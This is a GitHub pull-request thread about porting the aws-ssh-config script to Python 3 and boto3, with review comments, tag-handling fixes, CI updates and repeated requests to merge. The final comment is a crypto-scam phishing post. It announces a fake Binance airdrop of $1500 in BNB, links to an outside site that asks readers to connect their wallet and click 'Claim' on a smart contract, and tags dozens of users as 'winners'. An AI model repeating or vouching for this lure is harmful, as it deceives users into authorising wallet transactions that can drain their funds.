create a version that supports boto3/python3, updated requirements file

Trozz opened the pull request:
added a version of the file support Python 3 and boto3, functionality is the same still

if you want I will rewrite the base file as well as submit a setup.py file to support running and installing the script as an application

Commit:
create a version that supports boto3/python3, updated requirements file

gianlucaborello commented:
Thanks for this. I am a little bit hesitant to merge it as is because of the significant amount of code duplication, it might create a maintainability nightmare moving forward, requiring to cherry pick each change into both files.

Can you by any chance think of a way to implement the support to Python 2 + 3 that is more idiomatic, perhaps in the same script?

This might not be possible (admittedly I've never used boto3, so I'm not aware of how much changed), so I'm just asking for my information. 

Thanks again

Trozz commented:
well boto3 is supported under python2 so I could write in python2 that is compatible with python3.

Commit:
convert if statement to try statement

Commit:
convert to simply use "python" with python2/python3 compatiblity

Commit:
remove boto requirement and ony use boto3

Commit:
pep8 / pycodestyle compliant

Trozz commented:
@gianlucaborello this is now pep8 compliant and works in both python2 / python3 using boto3

gregn610 committed:
Handle no tags

Trozz commented:
@gianlucaborello any chance of merging?

Trozz committed:
Merge pull request #1 from gregn610/gregn610-tags

Handle no tags

gianlucaborello commented:
Sorry, I've been super busy and had no time to review this. I will be able to take a look and test it after things calm down a little from my end. Thanks.

Trozz committed:
Update pythonpackage.yml

rromanchuk commented on aws-ssh-config.py:
```diff
@@ -34,46 +33,90 @@ def generate_id(instance, tags_filter, region):
-                    instance_id = value
-                else:
-                    instance_id += '-' + value
+            for aws_tag in instance['Instances'][0].get('Tags', []):
```
This looks like a minor copy/paste error. As it is currently if you pass `--tags Name`, it will iterate through all instance tags and append with -, regardless of what tags were passed.

I added the following break here, and now works as expected
```python
if aws_tag['Key'] != tag:
    continue
```

rromanchuk committed:
skip appending a tag value if it's not in the given filter

rromanchuk commented:
Sent a PR https://github.com/Trozz/aws-ssh-config/pull/2

Not a python guy, also unfamiliar with boto3 lib, so there's probably a better way without this branching but i'm just limiting my exposure so i dont end up in the weeds. I'm now using this in my ansible playbooks. 

Here's my usage in production. It's working well with the updated version, and i removed my python2 dependency. 

```yaml
- name: Update ssh config
  shell: ./aws-ssh-config.py --private --tags Name --default-user ubuntu > .ssh/config
  become_user: ubuntu
  args:
    chdir: /home/ubuntu
```

Trozz committed:
Merge pull request #2 from rromanchuk/fix-tag-filter

Skip appending a tag value if it's not in the given filter

Trozz commented:
> Sent a PR [Trozz#2](https://github.com/Trozz/aws-ssh-config/pull/2)
> 
> Not a python guy, also unfamiliar with boto3 lib, so there's probably a better way without this branching but i'm just limiting my exposure so i dont end up in the weeds. I'm now using this in my ansible playbooks.
> 
> Here's my usage in production. It's working well with the updated version, and i removed my python2 dependency.
> 
> ```yaml
> - name: Update ssh config
>   shell: ./aws-ssh-config.py --private --tags Name --default-user ubuntu > .ssh/config
>   become_user: ubuntu
>   args:
>     chdir: /home/ubuntu
> ```

looks good, I wonder if you would be able to generate the same thing using the Ansible dynamic inventories :-)

Trozz commented:
@gianlucaborello any luck getting this in

Trozz commented:
@gianlucaborello appreciate that you've probably had other things going on, if you would like I am happy to become a collaborator on this with you to keep development up

legoscia committed:
Sort tags by key

Tag order is non-deterministic, so instances with the same tags set
might end up not getting sequential names, e.g. 'foo-bar' and
'bar-foo' instead of 'foo-bar-1' and 'foo-bar-2'.

Trozz committed:
Merge pull request #3 from legoscia/sort-tags

Sort tags by key

Trozz committed:
Update pythonpackage.yml

add newer versions of python

Trozz committed:
Merge pull request #4 from Trozz/add_python_38_39

Add newer versions of python for automated build testing

Trozz commented:
Hi @gianlucaborello,

Hope all is well, any chance we can look to get these merged? I would be happy to take over this repo if you no-longer have the time 

Trozz

borisvezmar commented:
Just a little nudge to show interest in this merge.
This tool is useful and it would be very nice to have it working again

noahdahlman commented:
Wanted to bump this as well, would be great to have an update

arconejeros commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @jmcjmmcjc, @carfieldca, @marcoroth, @hzdlive, @Mengshan0521, @SalmonRunAround, @BlackSwanBay, @edwardchoijc, @Xembie, @ifree, @vanhauser-thc, @sean-porras, @nurmukhametov, @Njinx, @Georger0ot, @hamid914, @yaghmr, @meodemsao, @sh1xo, @gaborgsomogyi, @lilili87222, @qdlmcfresh, @Ai-Tong, @thaolt, @andrew-morris, @HynekPetrak, @shyang, @TkTech, @h0x32, @4534534, @king6cong, @mydbs, @kmyk, @1677, @dimon222, @sk0x1234, @tkersey, @foxhoundsk, @setersora, @shuheque, @Sourabhshrma, @multilinguist, @mateuspinto, @LordAlbior, @eliaskousk, @zJz20505, @CyrilleFranchet, @royceljh, @juliao, @satyam126
